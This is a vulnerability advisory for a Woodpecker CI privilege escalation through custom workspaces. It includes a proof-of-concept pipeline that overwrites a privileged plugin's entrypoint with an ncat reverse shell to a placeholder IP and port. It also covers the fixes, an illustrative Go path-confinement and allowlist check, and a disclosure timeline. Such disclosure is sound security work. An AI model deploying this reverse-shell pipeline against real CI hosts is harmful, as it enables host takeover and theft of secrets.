CVE-2024-41121 ‒ Privilege escalation via custom workspace
Description
Woodpecker is a simple yet powerful CI/CD engine with great extensibility. However, a vulnerability was identified that allows any user with permission to create workflows and trigger pipeline runs to take over the host. This vulnerability poses two potential risks:

1. Malicious workflows could lead to a host takeover of the agent executing the workflow.
2. Attackers could extract sensitive secrets that are typically passed to the plugins, by overwriting their entry points.

These issues have been addressed in release version 2.7.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Vulnerability
Woodpecker build pipelines allow users to specify a base container image. By default, Woodpecker executes certain plugin images in a privileged container.
```go
// PrivilegedPlugins can be changed by 'WOODPECKER_ESCALATE' at runtime.
var PrivilegedPlugins = []string{
	"plugins/docker",
	"plugins/gcr",
	"plugins/ecr",
	"woodpeckerci/plugin-docker-buildx",
	"codeberg.org/woodpecker-plugins/docker-buildx",
}
```
This behavior introduces a privilege escalation risk. If an attacker gains code execution within a privileged container, they can escalate privileges further. For example, by specifying a custom workspace (bind-mounted inside the container) and overwriting the container’s entry point, a malicious actor could execute arbitrary commands, such as launching a reverse shell.
POC
The following demonstrates how this vulnerability could be exploited. Create a repo with the following content:
- `<repo>/fake-local/bin/dockerd-entrypoint.sh`:

  ```sh
  #!/bin/sh
  /usr/local/ncat -e /usr/local/bash <ip> <port>
  ```

- `<repo>/bash` (statically linked bash)
- `<repo>/ncat` (statically linked ncat)
- `<repo>/.woodpecker.yaml`:

  ```yaml
  workspace:
    base: /usr/local/
  steps:
    - name: prepare
      image: alpine
      commands:
        - mkdir -p /usr/local/bin/
        - cp fake-local/bin/dockerd-entrypoint.sh /usr/local/bin/dockerd-entrypoint.sh
        - cp ncat /usr/local/ncat
        - cp bash /usr/local/bash
        - chmod +x /usr/local/bin/dockerd-entrypoint.sh
        - chmod +x /usr/local/ncat
        - chmod +x /usr/local/bash
    - name: drone
      image: plugins/docker
  ```
By using the configuration above, an attacker can replace the entry point and achieve arbitrary code execution.
Mitigations
The following fixes address this issue:
- Restrict workspace paths: Workspaces are now always relative to a base path (`/woodpecker`). Fixed in PR #3933
- Plugins run unprivileged by default: All plugins now run in unprivileged mode by default. Fixed in PR #4053
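The two fixes above are easiest to reason about as two small admission checks on a pipeline step. The following Go code is an added example written for this page, not code from the Woodpecker project or from either PR: it confines a user-supplied `workspace.base` to a fixed root (the constant `WorkspaceBase`, modelled on the `/woodpecker` base path above) and decides whether a step image may run privileged from an allowlist that is empty by default. The function names, the tag-stripping rule in `imageRepo`, and the choice to reject rather than silently clamp an escaping path are all assumptions of this example.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// WorkspaceBase is the fixed root every pipeline workspace is confined to.
// Assumed constant, modelled on the "/woodpecker" base path named in the advisory.
const WorkspaceBase = "/woodpecker"

// ErrEscapesBase is returned when a user-supplied workspace would resolve
// outside WorkspaceBase after path normalisation.
var ErrEscapesBase = errors.New("workspace path escapes base directory")

// ResolveWorkspace maps a user-controlled workspace value onto a path under
// WorkspaceBase. An absolute value such as "/usr/local/" is treated as relative
// to the base instead of being honoured as-is, and ".." components are
// collapsed by filepath.Join before the containment check, so neither an
// absolute path nor traversal can reach a location like /usr/local/bin.
func ResolveWorkspace(userPath string) (string, error) {
	rel := strings.TrimLeft(userPath, "/")
	joined := filepath.Join(WorkspaceBase, rel) // Join also cleans the result
	if joined != WorkspaceBase &&
		!strings.HasPrefix(joined, WorkspaceBase+string(filepath.Separator)) {
		return "", ErrEscapesBase
	}
	return joined, nil
}

// DefaultPrivilegedImages is the allowlist of images permitted to run
// privileged when the operator has configured nothing. It is empty, matching
// the post-fix behaviour; the pre-fix default listed plugins/docker and others.
var DefaultPrivilegedImages = []string{}

// imageRepo strips a digest ("@sha256:...") and a tag (":latest") so that
// "plugins/docker:20.10" compares equal to the allowlist entry "plugins/docker".
// A registry port ("registry:5000/x") is left alone because its colon sits
// before the last "/".
func imageRepo(image string) string {
	if at := strings.Index(image, "@"); at >= 0 {
		image = image[:at]
	}
	slash := strings.LastIndex(image, "/")
	if colon := strings.LastIndex(image, ":"); colon > slash {
		image = image[:colon]
	}
	return image
}

// IsPrivileged reports whether a step image may run privileged: only an exact
// repository match against the operator-supplied allowlist counts, so a step
// never becomes privileged merely by naming a well-known plugin image.
func IsPrivileged(image string, allowlist []string) bool {
	repo := imageRepo(image)
	for _, allowed := range allowlist {
		if repo == allowed {
			return true
		}
	}
	return false
}

func main() {
	// Values taken from the advisory's proof of concept.
	ws, err := ResolveWorkspace("/usr/local/")
	fmt.Println("workspace:", ws, err) // /woodpecker/usr/local <nil>
	_, err = ResolveWorkspace("../../etc")
	fmt.Println("traversal:", err) // workspace path escapes base directory
	fmt.Println("plugins/docker privileged by default:",
		IsPrivileged("plugins/docker", DefaultPrivilegedImages)) // false
	fmt.Println("with explicit escalation:",
		IsPrivileged("plugins/docker:20.10", []string{"plugins/docker"})) // true
}
```

With these checks in place the proof-of-concept pipeline loses both of its footholds: `base: /usr/local/` lands under `/woodpecker/usr/local`, so the `prepare` step can no longer overwrite `/usr/local/bin/dockerd-entrypoint.sh` on the image's real filesystem, and the `plugins/docker` step runs unprivileged unless the operator has deliberately put that image on the allowlist.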
Timeline
| Date | Action |
|---|---|
| 13.07.2024 | Neodyme reports the issue via email to security@woodpecker-ci.org |
| 14.07.2024 | The Woodpecker team acknowledges the report |
| 15.07.2024 | The Woodpecker team triages the issue and provides an action plan |
| 16.07.2024 | The Woodpecker team adds Neodyme employees to their security repository for further discussion |
| 18.07.2024 | The Woodpecker team fixes the workspace issue here |
| 19.07.2024 | The Woodpecker team publishes a security disclosure |
| 31.08.2024 | The Woodpecker team removes 3rd-party default privileged plugins here |
| 02.09.2024 | The Woodpecker team removes all default privileged plugins here |